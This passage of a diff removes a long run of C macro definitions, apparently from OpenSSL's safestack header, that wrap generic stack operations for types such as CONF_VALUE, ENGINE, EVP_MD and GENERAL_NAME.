-#define sk_CONF_MODULE_dup(st) SKM_sk_dup(CONF_MODULE, st)
-#define sk_CONF_MODULE_pop_free(st, free_func) SKM_sk_pop_free(CONF_MODULE, (st), (free_func))
-#define sk_CONF_MODULE_shift(st) SKM_sk_shift(CONF_MODULE, (st))
-#define sk_CONF_MODULE_pop(st) SKM_sk_pop(CONF_MODULE, (st))
-#define sk_CONF_MODULE_sort(st) SKM_sk_sort(CONF_MODULE, (st))
-#define sk_CONF_MODULE_is_sorted(st) SKM_sk_is_sorted(CONF_MODULE, (st))
-
-#define sk_CONF_VALUE_new(cmp) SKM_sk_new(CONF_VALUE, (cmp))
-#define sk_CONF_VALUE_new_null() SKM_sk_new_null(CONF_VALUE)
-#define sk_CONF_VALUE_free(st) SKM_sk_free(CONF_VALUE, (st))
-#define sk_CONF_VALUE_num(st) SKM_sk_num(CONF_VALUE, (st))
-#define sk_CONF_VALUE_value(st, i) SKM_sk_value(CONF_VALUE, (st), (i))
-#define sk_CONF_VALUE_set(st, i, val) SKM_sk_set(CONF_VALUE, (st), (i), (val))
-#define sk_CONF_VALUE_zero(st) SKM_sk_zero(CONF_VALUE, (st))
-#define sk_CONF_VALUE_push(st, val) SKM_sk_push(CONF_VALUE, (st), (val))
-#define sk_CONF_VALUE_unshift(st, val) SKM_sk_unshift(CONF_VALUE, (st), (val))
-#define sk_CONF_VALUE_find(st, val) SKM_sk_find(CONF_VALUE, (st), (val))
-#define sk_CONF_VALUE_find_ex(st, val) SKM_sk_find_ex(CONF_VALUE, (st), (val))
-#define sk_CONF_VALUE_delete(st, i) SKM_sk_delete(CONF_VALUE, (st), (i))
-#define sk_CONF_VALUE_delete_ptr(st, ptr) SKM_sk_delete_ptr(CONF_VALUE, (st), (ptr))
-#define sk_CONF_VALUE_insert(st, val, i) SKM_sk_insert(CONF_VALUE, (st), (val), (i))
-#define sk_CONF_VALUE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CONF_VALUE, (st), (cmp))
-#define sk_CONF_VALUE_dup(st) SKM_sk_dup(CONF_VALUE, st)
-#define sk_CONF_VALUE_pop_free(st, free_func) SKM_sk_pop_free(CONF_VALUE, (st), (free_func))
-#define sk_CONF_VALUE_shift(st) SKM_sk_shift(CONF_VALUE, (st))
-#define sk_CONF_VALUE_pop(st) SKM_sk_pop(CONF_VALUE, (st))
-#define sk_CONF_VALUE_sort(st) SKM_sk_sort(CONF_VALUE, (st))
-#define sk_CONF_VALUE_is_sorted(st) SKM_sk_is_sorted(CONF_VALUE, (st))
-
-#define sk_CRYPTO_EX_DATA_FUNCS_new(cmp) SKM_sk_new(CRYPTO_EX_DATA_FUNCS, (cmp))
-#define sk_CRYPTO_EX_DATA_FUNCS_new_null() SKM_sk_new_null(CRYPTO_EX_DATA_FUNCS)
-#define sk_CRYPTO_EX_DATA_FUNCS_free(st) SKM_sk_free(CRYPTO_EX_DATA_FUNCS, (st))
-#define sk_CRYPTO_EX_DATA_FUNCS_num(st) SKM_sk_num(CRYPTO_EX_DATA_FUNCS, (st))
-#define sk_CRYPTO_EX_DATA_FUNCS_value(st, i) SKM_sk_value(CRYPTO_EX_DATA_FUNCS, (st), (i))
-#define sk_CRYPTO_EX_DATA_FUNCS_set(st, i, val) SKM_sk_set(CRYPTO_EX_DATA_FUNCS, (st), (i), (val))
-#define sk_CRYPTO_EX_DATA_FUNCS_zero(st) SKM_sk_zero(CRYPTO_EX_DATA_FUNCS, (st))
-#define sk_CRYPTO_EX_DATA_FUNCS_push(st, val) SKM_sk_push(CRYPTO_EX_DATA_FUNCS, (st), (val))
-#define sk_CRYPTO_EX_DATA_FUNCS_unshift(st, val) SKM_sk_unshift(CRYPTO_EX_DATA_FUNCS, (st), (val))
-#define sk_CRYPTO_EX_DATA_FUNCS_find(st, val) SKM_sk_find(CRYPTO_EX_DATA_FUNCS, (st), (val))
-#define sk_CRYPTO_EX_DATA_FUNCS_find_ex(st, val) SKM_sk_find_ex(CRYPTO_EX_DATA_FUNCS, (st), (val))
-#define sk_CRYPTO_EX_DATA_FUNCS_delete(st, i) SKM_sk_delete(CRYPTO_EX_DATA_FUNCS, (st), (i))
-#define sk_CRYPTO_EX_DATA_FUNCS_delete_ptr(st, ptr) SKM_sk_delete_ptr(CRYPTO_EX_DATA_FUNCS, (st), (ptr))
-#define sk_CRYPTO_EX_DATA_FUNCS_insert(st, val, i) SKM_sk_insert(CRYPTO_EX_DATA_FUNCS, (st), (val), (i))
-#define sk_CRYPTO_EX_DATA_FUNCS_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CRYPTO_EX_DATA_FUNCS, (st), (cmp))
-#define sk_CRYPTO_EX_DATA_FUNCS_dup(st) SKM_sk_dup(CRYPTO_EX_DATA_FUNCS, st)
-#define sk_CRYPTO_EX_DATA_FUNCS_pop_free(st, free_func) SKM_sk_pop_free(CRYPTO_EX_DATA_FUNCS, (st), (free_func))
-#define sk_CRYPTO_EX_DATA_FUNCS_shift(st) SKM_sk_shift(CRYPTO_EX_DATA_FUNCS, (st))
-#define sk_CRYPTO_EX_DATA_FUNCS_pop(st) SKM_sk_pop(CRYPTO_EX_DATA_FUNCS, (st))
-#define sk_CRYPTO_EX_DATA_FUNCS_sort(st) SKM_sk_sort(CRYPTO_EX_DATA_FUNCS, (st))
-#define sk_CRYPTO_EX_DATA_FUNCS_is_sorted(st) SKM_sk_is_sorted(CRYPTO_EX_DATA_FUNCS, (st))
-
-#define sk_CRYPTO_dynlock_new(cmp) SKM_sk_new(CRYPTO_dynlock, (cmp))
-#define sk_CRYPTO_dynlock_new_null() SKM_sk_new_null(CRYPTO_dynlock)
-#define sk_CRYPTO_dynlock_free(st) SKM_sk_free(CRYPTO_dynlock, (st))
-#define sk_CRYPTO_dynlock_num(st) SKM_sk_num(CRYPTO_dynlock, (st))
-#define sk_CRYPTO_dynlock_value(st, i) SKM_sk_value(CRYPTO_dynlock, (st), (i))
-#define sk_CRYPTO_dynlock_set(st, i, val) SKM_sk_set(CRYPTO_dynlock, (st), (i), (val))
-#define sk_CRYPTO_dynlock_zero(st) SKM_sk_zero(CRYPTO_dynlock, (st))
-#define sk_CRYPTO_dynlock_push(st, val) SKM_sk_push(CRYPTO_dynlock, (st), (val))
-#define sk_CRYPTO_dynlock_unshift(st, val) SKM_sk_unshift(CRYPTO_dynlock, (st), (val))
-#define sk_CRYPTO_dynlock_find(st, val) SKM_sk_find(CRYPTO_dynlock, (st), (val))
-#define sk_CRYPTO_dynlock_find_ex(st, val) SKM_sk_find_ex(CRYPTO_dynlock, (st), (val))
-#define sk_CRYPTO_dynlock_delete(st, i) SKM_sk_delete(CRYPTO_dynlock, (st), (i))
-#define sk_CRYPTO_dynlock_delete_ptr(st, ptr) SKM_sk_delete_ptr(CRYPTO_dynlock, (st), (ptr))
-#define sk_CRYPTO_dynlock_insert(st, val, i) SKM_sk_insert(CRYPTO_dynlock, (st), (val), (i))
-#define sk_CRYPTO_dynlock_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CRYPTO_dynlock, (st), (cmp))
-#define sk_CRYPTO_dynlock_dup(st) SKM_sk_dup(CRYPTO_dynlock, st)
-#define sk_CRYPTO_dynlock_pop_free(st, free_func) SKM_sk_pop_free(CRYPTO_dynlock, (st), (free_func))
-#define sk_CRYPTO_dynlock_shift(st) SKM_sk_shift(CRYPTO_dynlock, (st))
-#define sk_CRYPTO_dynlock_pop(st) SKM_sk_pop(CRYPTO_dynlock, (st))
-#define sk_CRYPTO_dynlock_sort(st) SKM_sk_sort(CRYPTO_dynlock, (st))
-#define sk_CRYPTO_dynlock_is_sorted(st) SKM_sk_is_sorted(CRYPTO_dynlock, (st))
-
-#define sk_DIST_POINT_new(cmp) SKM_sk_new(DIST_POINT, (cmp))
-#define sk_DIST_POINT_new_null() SKM_sk_new_null(DIST_POINT)
-#define sk_DIST_POINT_free(st) SKM_sk_free(DIST_POINT, (st))
-#define sk_DIST_POINT_num(st) SKM_sk_num(DIST_POINT, (st))
-#define sk_DIST_POINT_value(st, i) SKM_sk_value(DIST_POINT, (st), (i))
-#define sk_DIST_POINT_set(st, i, val) SKM_sk_set(DIST_POINT, (st), (i), (val))
-#define sk_DIST_POINT_zero(st) SKM_sk_zero(DIST_POINT, (st))
-#define sk_DIST_POINT_push(st, val) SKM_sk_push(DIST_POINT, (st), (val))
-#define sk_DIST_POINT_unshift(st, val) SKM_sk_unshift(DIST_POINT, (st), (val))
-#define sk_DIST_POINT_find(st, val) SKM_sk_find(DIST_POINT, (st), (val))
-#define sk_DIST_POINT_find_ex(st, val) SKM_sk_find_ex(DIST_POINT, (st), (val))
-#define sk_DIST_POINT_delete(st, i) SKM_sk_delete(DIST_POINT, (st), (i))
-#define sk_DIST_POINT_delete_ptr(st, ptr) SKM_sk_delete_ptr(DIST_POINT, (st), (ptr))
-#define sk_DIST_POINT_insert(st, val, i) SKM_sk_insert(DIST_POINT, (st), (val), (i))
-#define sk_DIST_POINT_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(DIST_POINT, (st), (cmp))
-#define sk_DIST_POINT_dup(st) SKM_sk_dup(DIST_POINT, st)
-#define sk_DIST_POINT_pop_free(st, free_func) SKM_sk_pop_free(DIST_POINT, (st), (free_func))
-#define sk_DIST_POINT_shift(st) SKM_sk_shift(DIST_POINT, (st))
-#define sk_DIST_POINT_pop(st) SKM_sk_pop(DIST_POINT, (st))
-#define sk_DIST_POINT_sort(st) SKM_sk_sort(DIST_POINT, (st))
-#define sk_DIST_POINT_is_sorted(st) SKM_sk_is_sorted(DIST_POINT, (st))
-
-#define sk_ENGINE_new(cmp) SKM_sk_new(ENGINE, (cmp))
-#define sk_ENGINE_new_null() SKM_sk_new_null(ENGINE)
-#define sk_ENGINE_free(st) SKM_sk_free(ENGINE, (st))
-#define sk_ENGINE_num(st) SKM_sk_num(ENGINE, (st))
-#define sk_ENGINE_value(st, i) SKM_sk_value(ENGINE, (st), (i))
-#define sk_ENGINE_set(st, i, val) SKM_sk_set(ENGINE, (st), (i), (val))
-#define sk_ENGINE_zero(st) SKM_sk_zero(ENGINE, (st))
-#define sk_ENGINE_push(st, val) SKM_sk_push(ENGINE, (st), (val))
-#define sk_ENGINE_unshift(st, val) SKM_sk_unshift(ENGINE, (st), (val))
-#define sk_ENGINE_find(st, val) SKM_sk_find(ENGINE, (st), (val))
-#define sk_ENGINE_find_ex(st, val) SKM_sk_find_ex(ENGINE, (st), (val))
-#define sk_ENGINE_delete(st, i) SKM_sk_delete(ENGINE, (st), (i))
-#define sk_ENGINE_delete_ptr(st, ptr) SKM_sk_delete_ptr(ENGINE, (st), (ptr))
-#define sk_ENGINE_insert(st, val, i) SKM_sk_insert(ENGINE, (st), (val), (i))
-#define sk_ENGINE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ENGINE, (st), (cmp))
-#define sk_ENGINE_dup(st) SKM_sk_dup(ENGINE, st)
-#define sk_ENGINE_pop_free(st, free_func) SKM_sk_pop_free(ENGINE, (st), (free_func))
-#define sk_ENGINE_shift(st) SKM_sk_shift(ENGINE, (st))
-#define sk_ENGINE_pop(st) SKM_sk_pop(ENGINE, (st))
-#define sk_ENGINE_sort(st) SKM_sk_sort(ENGINE, (st))
-#define sk_ENGINE_is_sorted(st) SKM_sk_is_sorted(ENGINE, (st))
-
-#define sk_ENGINE_CLEANUP_ITEM_new(cmp) SKM_sk_new(ENGINE_CLEANUP_ITEM, (cmp))
-#define sk_ENGINE_CLEANUP_ITEM_new_null() SKM_sk_new_null(ENGINE_CLEANUP_ITEM)
-#define sk_ENGINE_CLEANUP_ITEM_free(st) SKM_sk_free(ENGINE_CLEANUP_ITEM, (st))
-#define sk_ENGINE_CLEANUP_ITEM_num(st) SKM_sk_num(ENGINE_CLEANUP_ITEM, (st))
-#define sk_ENGINE_CLEANUP_ITEM_value(st, i) SKM_sk_value(ENGINE_CLEANUP_ITEM, (st), (i))
-#define sk_ENGINE_CLEANUP_ITEM_set(st, i, val) SKM_sk_set(ENGINE_CLEANUP_ITEM, (st), (i), (val))
-#define sk_ENGINE_CLEANUP_ITEM_zero(st) SKM_sk_zero(ENGINE_CLEANUP_ITEM, (st))
-#define sk_ENGINE_CLEANUP_ITEM_push(st, val) SKM_sk_push(ENGINE_CLEANUP_ITEM, (st), (val))
-#define sk_ENGINE_CLEANUP_ITEM_unshift(st, val) SKM_sk_unshift(ENGINE_CLEANUP_ITEM, (st), (val))
-#define sk_ENGINE_CLEANUP_ITEM_find(st, val) SKM_sk_find(ENGINE_CLEANUP_ITEM, (st), (val))
-#define sk_ENGINE_CLEANUP_ITEM_find_ex(st, val) SKM_sk_find_ex(ENGINE_CLEANUP_ITEM, (st), (val))
-#define sk_ENGINE_CLEANUP_ITEM_delete(st, i) SKM_sk_delete(ENGINE_CLEANUP_ITEM, (st), (i))
-#define sk_ENGINE_CLEANUP_ITEM_delete_ptr(st, ptr) SKM_sk_delete_ptr(ENGINE_CLEANUP_ITEM, (st), (ptr))
-#define sk_ENGINE_CLEANUP_ITEM_insert(st, val, i) SKM_sk_insert(ENGINE_CLEANUP_ITEM, (st), (val), (i))
-#define sk_ENGINE_CLEANUP_ITEM_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ENGINE_CLEANUP_ITEM, (st), (cmp))
-#define sk_ENGINE_CLEANUP_ITEM_dup(st) SKM_sk_dup(ENGINE_CLEANUP_ITEM, st)
-#define sk_ENGINE_CLEANUP_ITEM_pop_free(st, free_func) SKM_sk_pop_free(ENGINE_CLEANUP_ITEM, (st), (free_func))
-#define sk_ENGINE_CLEANUP_ITEM_shift(st) SKM_sk_shift(ENGINE_CLEANUP_ITEM, (st))
-#define sk_ENGINE_CLEANUP_ITEM_pop(st) SKM_sk_pop(ENGINE_CLEANUP_ITEM, (st))
-#define sk_ENGINE_CLEANUP_ITEM_sort(st) SKM_sk_sort(ENGINE_CLEANUP_ITEM, (st))
-#define sk_ENGINE_CLEANUP_ITEM_is_sorted(st) SKM_sk_is_sorted(ENGINE_CLEANUP_ITEM, (st))
-
-#define sk_ESS_CERT_ID_new(cmp) SKM_sk_new(ESS_CERT_ID, (cmp))
-#define sk_ESS_CERT_ID_new_null() SKM_sk_new_null(ESS_CERT_ID)
-#define sk_ESS_CERT_ID_free(st) SKM_sk_free(ESS_CERT_ID, (st))
-#define sk_ESS_CERT_ID_num(st) SKM_sk_num(ESS_CERT_ID, (st))
-#define sk_ESS_CERT_ID_value(st, i) SKM_sk_value(ESS_CERT_ID, (st), (i))
-#define sk_ESS_CERT_ID_set(st, i, val) SKM_sk_set(ESS_CERT_ID, (st), (i), (val))
-#define sk_ESS_CERT_ID_zero(st) SKM_sk_zero(ESS_CERT_ID, (st))
-#define sk_ESS_CERT_ID_push(st, val) SKM_sk_push(ESS_CERT_ID, (st), (val))
-#define sk_ESS_CERT_ID_unshift(st, val) SKM_sk_unshift(ESS_CERT_ID, (st), (val))
-#define sk_ESS_CERT_ID_find(st, val) SKM_sk_find(ESS_CERT_ID, (st), (val))
-#define sk_ESS_CERT_ID_find_ex(st, val) SKM_sk_find_ex(ESS_CERT_ID, (st), (val))
-#define sk_ESS_CERT_ID_delete(st, i) SKM_sk_delete(ESS_CERT_ID, (st), (i))
-#define sk_ESS_CERT_ID_delete_ptr(st, ptr) SKM_sk_delete_ptr(ESS_CERT_ID, (st), (ptr))
-#define sk_ESS_CERT_ID_insert(st, val, i) SKM_sk_insert(ESS_CERT_ID, (st), (val), (i))
-#define sk_ESS_CERT_ID_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ESS_CERT_ID, (st), (cmp))
-#define sk_ESS_CERT_ID_dup(st) SKM_sk_dup(ESS_CERT_ID, st)
-#define sk_ESS_CERT_ID_pop_free(st, free_func) SKM_sk_pop_free(ESS_CERT_ID, (st), (free_func))
-#define sk_ESS_CERT_ID_shift(st) SKM_sk_shift(ESS_CERT_ID, (st))
-#define sk_ESS_CERT_ID_pop(st) SKM_sk_pop(ESS_CERT_ID, (st))
-#define sk_ESS_CERT_ID_sort(st) SKM_sk_sort(ESS_CERT_ID, (st))
-#define sk_ESS_CERT_ID_is_sorted(st) SKM_sk_is_sorted(ESS_CERT_ID, (st))
-
-#define sk_EVP_MD_new(cmp) SKM_sk_new(EVP_MD, (cmp))
-#define sk_EVP_MD_new_null() SKM_sk_new_null(EVP_MD)
-#define sk_EVP_MD_free(st) SKM_sk_free(EVP_MD, (st))
-#define sk_EVP_MD_num(st) SKM_sk_num(EVP_MD, (st))
-#define sk_EVP_MD_value(st, i) SKM_sk_value(EVP_MD, (st), (i))
-#define sk_EVP_MD_set(st, i, val) SKM_sk_set(EVP_MD, (st), (i), (val))
-#define sk_EVP_MD_zero(st) SKM_sk_zero(EVP_MD, (st))
-#define sk_EVP_MD_push(st, val) SKM_sk_push(EVP_MD, (st), (val))
-#define sk_EVP_MD_unshift(st, val) SKM_sk_unshift(EVP_MD, (st), (val))
-#define sk_EVP_MD_find(st, val) SKM_sk_find(EVP_MD, (st), (val))
-#define sk_EVP_MD_find_ex(st, val) SKM_sk_find_ex(EVP_MD, (st), (val))
-#define sk_EVP_MD_delete(st, i) SKM_sk_delete(EVP_MD, (st), (i))
-#define sk_EVP_MD_delete_ptr(st, ptr) SKM_sk_delete_ptr(EVP_MD, (st), (ptr))
-#define sk_EVP_MD_insert(st, val, i) SKM_sk_insert(EVP_MD, (st), (val), (i))
-#define sk_EVP_MD_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(EVP_MD, (st), (cmp))
-#define sk_EVP_MD_dup(st) SKM_sk_dup(EVP_MD, st)
-#define sk_EVP_MD_pop_free(st, free_func) SKM_sk_pop_free(EVP_MD, (st), (free_func))
-#define sk_EVP_MD_shift(st) SKM_sk_shift(EVP_MD, (st))
-#define sk_EVP_MD_pop(st) SKM_sk_pop(EVP_MD, (st))
-#define sk_EVP_MD_sort(st) SKM_sk_sort(EVP_MD, (st))
-#define sk_EVP_MD_is_sorted(st) SKM_sk_is_sorted(EVP_MD, (st))
-
-#define sk_EVP_PBE_CTL_new(cmp) SKM_sk_new(EVP_PBE_CTL, (cmp))
-#define sk_EVP_PBE_CTL_new_null() SKM_sk_new_null(EVP_PBE_CTL)
-#define sk_EVP_PBE_CTL_free(st) SKM_sk_free(EVP_PBE_CTL, (st))
-#define sk_EVP_PBE_CTL_num(st) SKM_sk_num(EVP_PBE_CTL, (st))
-#define sk_EVP_PBE_CTL_value(st, i) SKM_sk_value(EVP_PBE_CTL, (st), (i))
-#define sk_EVP_PBE_CTL_set(st, i, val) SKM_sk_set(EVP_PBE_CTL, (st), (i), (val))
-#define sk_EVP_PBE_CTL_zero(st) SKM_sk_zero(EVP_PBE_CTL, (st))
-#define sk_EVP_PBE_CTL_push(st, val) SKM_sk_push(EVP_PBE_CTL, (st), (val))
-#define sk_EVP_PBE_CTL_unshift(st, val) SKM_sk_unshift(EVP_PBE_CTL, (st), (val))
-#define sk_EVP_PBE_CTL_find(st, val) SKM_sk_find(EVP_PBE_CTL, (st), (val))
-#define sk_EVP_PBE_CTL_find_ex(st, val) SKM_sk_find_ex(EVP_PBE_CTL, (st), (val))
-#define sk_EVP_PBE_CTL_delete(st, i) SKM_sk_delete(EVP_PBE_CTL, (st), (i))
-#define sk_EVP_PBE_CTL_delete_ptr(st, ptr) SKM_sk_delete_ptr(EVP_PBE_CTL, (st), (ptr))
-#define sk_EVP_PBE_CTL_insert(st, val, i) SKM_sk_insert(EVP_PBE_CTL, (st), (val), (i))
-#define sk_EVP_PBE_CTL_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(EVP_PBE_CTL, (st), (cmp))
-#define sk_EVP_PBE_CTL_dup(st) SKM_sk_dup(EVP_PBE_CTL, st)
-#define sk_EVP_PBE_CTL_pop_free(st, free_func) SKM_sk_pop_free(EVP_PBE_CTL, (st), (free_func))
-#define sk_EVP_PBE_CTL_shift(st) SKM_sk_shift(EVP_PBE_CTL, (st))
-#define sk_EVP_PBE_CTL_pop(st) SKM_sk_pop(EVP_PBE_CTL, (st))
-#define sk_EVP_PBE_CTL_sort(st) SKM_sk_sort(EVP_PBE_CTL, (st))
-#define sk_EVP_PBE_CTL_is_sorted(st) SKM_sk_is_sorted(EVP_PBE_CTL, (st))
-
-#define sk_EVP_PKEY_ASN1_METHOD_new(cmp) SKM_sk_new(EVP_PKEY_ASN1_METHOD, (cmp))
-#define sk_EVP_PKEY_ASN1_METHOD_new_null() SKM_sk_new_null(EVP_PKEY_ASN1_METHOD)
-#define sk_EVP_PKEY_ASN1_METHOD_free(st) SKM_sk_free(EVP_PKEY_ASN1_METHOD, (st))
-#define sk_EVP_PKEY_ASN1_METHOD_num(st) SKM_sk_num(EVP_PKEY_ASN1_METHOD, (st))
-#define sk_EVP_PKEY_ASN1_METHOD_value(st, i) SKM_sk_value(EVP_PKEY_ASN1_METHOD, (st), (i))
-#define sk_EVP_PKEY_ASN1_METHOD_set(st, i, val) SKM_sk_set(EVP_PKEY_ASN1_METHOD, (st), (i), (val))
-#define sk_EVP_PKEY_ASN1_METHOD_zero(st) SKM_sk_zero(EVP_PKEY_ASN1_METHOD, (st))
-#define sk_EVP_PKEY_ASN1_METHOD_push(st, val) SKM_sk_push(EVP_PKEY_ASN1_METHOD, (st), (val))
-#define sk_EVP_PKEY_ASN1_METHOD_unshift(st, val) SKM_sk_unshift(EVP_PKEY_ASN1_METHOD, (st), (val))
-#define sk_EVP_PKEY_ASN1_METHOD_find(st, val) SKM_sk_find(EVP_PKEY_ASN1_METHOD, (st), (val))
-#define sk_EVP_PKEY_ASN1_METHOD_find_ex(st, val) SKM_sk_find_ex(EVP_PKEY_ASN1_METHOD, (st), (val))
-#define sk_EVP_PKEY_ASN1_METHOD_delete(st, i) SKM_sk_delete(EVP_PKEY_ASN1_METHOD, (st), (i))
-#define sk_EVP_PKEY_ASN1_METHOD_delete_ptr(st, ptr) SKM_sk_delete_ptr(EVP_PKEY_ASN1_METHOD, (st), (ptr))
-#define sk_EVP_PKEY_ASN1_METHOD_insert(st, val, i) SKM_sk_insert(EVP_PKEY_ASN1_METHOD, (st), (val), (i))
-#define sk_EVP_PKEY_ASN1_METHOD_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(EVP_PKEY_ASN1_METHOD, (st), (cmp))
-#define sk_EVP_PKEY_ASN1_METHOD_dup(st) SKM_sk_dup(EVP_PKEY_ASN1_METHOD, st)
-#define sk_EVP_PKEY_ASN1_METHOD_pop_free(st, free_func) SKM_sk_pop_free(EVP_PKEY_ASN1_METHOD, (st), (free_func))
-#define sk_EVP_PKEY_ASN1_METHOD_shift(st) SKM_sk_shift(EVP_PKEY_ASN1_METHOD, (st))
-#define sk_EVP_PKEY_ASN1_METHOD_pop(st) SKM_sk_pop(EVP_PKEY_ASN1_METHOD, (st))
-#define sk_EVP_PKEY_ASN1_METHOD_sort(st) SKM_sk_sort(EVP_PKEY_ASN1_METHOD, (st))
-#define sk_EVP_PKEY_ASN1_METHOD_is_sorted(st) SKM_sk_is_sorted(EVP_PKEY_ASN1_METHOD, (st))
-
-#define sk_EVP_PKEY_METHOD_new(cmp) SKM_sk_new(EVP_PKEY_METHOD, (cmp))
-#define sk_EVP_PKEY_METHOD_new_null() SKM_sk_new_null(EVP_PKEY_METHOD)
-#define sk_EVP_PKEY_METHOD_free(st) SKM_sk_free(EVP_PKEY_METHOD, (st))
-#define sk_EVP_PKEY_METHOD_num(st) SKM_sk_num(EVP_PKEY_METHOD, (st))
-#define sk_EVP_PKEY_METHOD_value(st, i) SKM_sk_value(EVP_PKEY_METHOD, (st), (i))
-#define sk_EVP_PKEY_METHOD_set(st, i, val) SKM_sk_set(EVP_PKEY_METHOD, (st), (i), (val))
-#define sk_EVP_PKEY_METHOD_zero(st) SKM_sk_zero(EVP_PKEY_METHOD, (st))
-#define sk_EVP_PKEY_METHOD_push(st, val) SKM_sk_push(EVP_PKEY_METHOD, (st), (val))
-#define sk_EVP_PKEY_METHOD_unshift(st, val) SKM_sk_unshift(EVP_PKEY_METHOD, (st), (val))
-#define sk_EVP_PKEY_METHOD_find(st, val) SKM_sk_find(EVP_PKEY_METHOD, (st), (val))
-#define sk_EVP_PKEY_METHOD_find_ex(st, val) SKM_sk_find_ex(EVP_PKEY_METHOD, (st), (val))
-#define sk_EVP_PKEY_METHOD_delete(st, i) SKM_sk_delete(EVP_PKEY_METHOD, (st), (i))
-#define sk_EVP_PKEY_METHOD_delete_ptr(st, ptr) SKM_sk_delete_ptr(EVP_PKEY_METHOD, (st), (ptr))
-#define sk_EVP_PKEY_METHOD_insert(st, val, i) SKM_sk_insert(EVP_PKEY_METHOD, (st), (val), (i))
-#define sk_EVP_PKEY_METHOD_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(EVP_PKEY_METHOD, (st), (cmp))
-#define sk_EVP_PKEY_METHOD_dup(st) SKM_sk_dup(EVP_PKEY_METHOD, st)
-#define sk_EVP_PKEY_METHOD_pop_free(st, free_func) SKM_sk_pop_free(EVP_PKEY_METHOD, (st), (free_func))
-#define sk_EVP_PKEY_METHOD_shift(st) SKM_sk_shift(EVP_PKEY_METHOD, (st))
-#define sk_EVP_PKEY_METHOD_pop(st) SKM_sk_pop(EVP_PKEY_METHOD, (st))
-#define sk_EVP_PKEY_METHOD_sort(st) SKM_sk_sort(EVP_PKEY_METHOD, (st))
-#define sk_EVP_PKEY_METHOD_is_sorted(st) SKM_sk_is_sorted(EVP_PKEY_METHOD, (st))
-
-#define sk_GENERAL_NAME_new(cmp) SKM_sk_new(GENERAL_NAME, (cmp))
-#define sk_GENERAL_NAME_new_null() SKM_sk_new_null(GENERAL_NAME)
-#define sk_GENERAL_NAME_free(st) SKM_sk_free(GENERAL_NAME, (st))
-#define sk_GENERAL_NAME_num(st) SKM_sk_num(GENERAL_NAME, (st))
-#define sk_GENERAL_NAME_value(st, i) SKM_sk_value(GENERAL_NAME, (st), (i))
-#define sk_GENERAL_NAME_set(st, i, val) SKM_sk_set(GENERAL_NAME, (st), (i), (val))
-#define sk_GENERAL_NAME_zero(st) SKM_sk_zero(GENERAL_NAME, (st))
-#define sk_GENERAL_NAME_push(st, val) SKM_sk_push(GENERAL_NAME, (st), (val))
-#define sk_GENERAL_NAME_unshift(st, val) SKM_sk_unshift(GENERAL_NAME, (st), (val))
-#define sk_GENERAL_NAME_find(st, val) SKM_sk_find(GENERAL_NAME, (st), (val))
-#define sk_GENERAL_NAME_find_ex(st, val) SKM_sk_find_ex(GENERAL_NAME, (st), (val))
-#define sk_GENERAL_NAME_delete(st, i) SKM_sk_delete(GENERAL_NAME, (st), (i))
-#define sk_GENERAL_NAME_delete_ptr(st, ptr) SKM_sk_delete_ptr(GENERAL_NAME, (st), (ptr))
-#define sk_GENERAL_NAME_insert(st, val, i) SKM_sk_insert(GENERAL_NAME, (st), (val), (i))
-#define sk_GENERAL_NAME_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(GENERAL_NAME, (st), (cmp))
-#define sk_GENERAL_NAME_dup(st) SKM_sk_dup(GENERAL_NAME, st)
-#define sk_GENERAL_NAME_pop_free(st, free_func) SKM_sk_pop_free(GENERAL_NAME, (st), (free_func))
-#define sk_GENERAL_NAME_shift(st) SKM_sk_shift(GENERAL_NAME, (st))
-#define sk_GENERAL_NAME_pop(st) SKM_sk_pop(GENERAL_NAME, (st))
-#define sk_GENERAL_NAME_sort(st) SKM_sk_sort(GENERAL_NAME, (st))
-#define sk_GENERAL_NAME_is_sorted(st) SKM_sk_is_sorted(GENERAL_NAME, (st))
-
-#define sk_GENERAL_NAMES_new(cmp) SKM_sk_new(GENERAL_NAMES, (cmp))
-#define sk_GENERAL_NAMES_new_null() SKM_sk_new_null(GENERAL_NAMES)
-#define sk_GENERAL_NAMES_free(st) SKM_sk_free(GENERAL_NAMES, (st))
-#define sk_GENERAL_NAMES_num(st) SKM_sk_num(GENERAL_NAMES, (st))
-#define sk_GENERAL_NAMES_value(st, i) SKM_sk_value(GENERAL_NAMES, (st), (i))
-#define sk_GENERAL_NAMES_set(st, i, val) SKM_sk_set(GENERAL_NAMES, (st), (i), (val))
-#define sk_GENERAL_NAMES_zero(st) SKM_sk_zero(GENERAL_NAMES, (st))
-#define sk_GENERAL_NAMES_push(st, val) SKM_sk_push(GENERAL_NAMES, (st), (val))
-#define sk_GENERAL_NAMES_unshift(st, val) SKM_sk_unshift(GENERAL_NAMES, (st), (val))
-#define sk_GENERAL_NAMES_find(st, val) SKM_sk_find(GENERAL_NAMES, (st), (val))
-#define sk_GENERAL_NAMES_find_ex(st, val) SKM_sk_find_ex(GENERAL_NAMES, (st), (val))
-#define sk_GENERAL_NAMES_delete(st, i) SKM_sk_delete(GENERAL_NAMES, (st), (i))
-#define sk_GENERAL_NAMES_delete_ptr(st, ptr) SKM_sk_delete_ptr(GENERAL_NAMES, (st), (ptr))
-#define sk_GENERAL_NAMES_insert(st, val, i) SKM_sk_insert(GENERAL_NAMES, (st), (val), (i))
-#define sk_GENERAL_NAMES_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(GENERAL_NAMES, (st), (cmp))
-#define sk_GENERAL_NAMES_dup(st) SKM_sk_dup(GENERAL_NAMES, st)
-#define sk_GENERAL_NAMES_pop_free(st, free_func) SKM_sk_pop_free(GENERAL_NAMES, (st), (free_func))
-#define sk_GENERAL_NAMES_shift(st) SKM_sk_shift(GENERAL_NAMES, (st))
-#define sk_GENERAL_NAMES_pop(st) SKM_sk_pop(GENERAL_NAMES, (st))
-#define sk_GENERAL_NAMES_sort(st) SKM_sk_sort(GENERAL_NAMES, (st))
-#define sk_GENERAL_NAMES_is_sorted(st) SKM_sk_is_sorted(GENERAL_NAMES, (st))
-
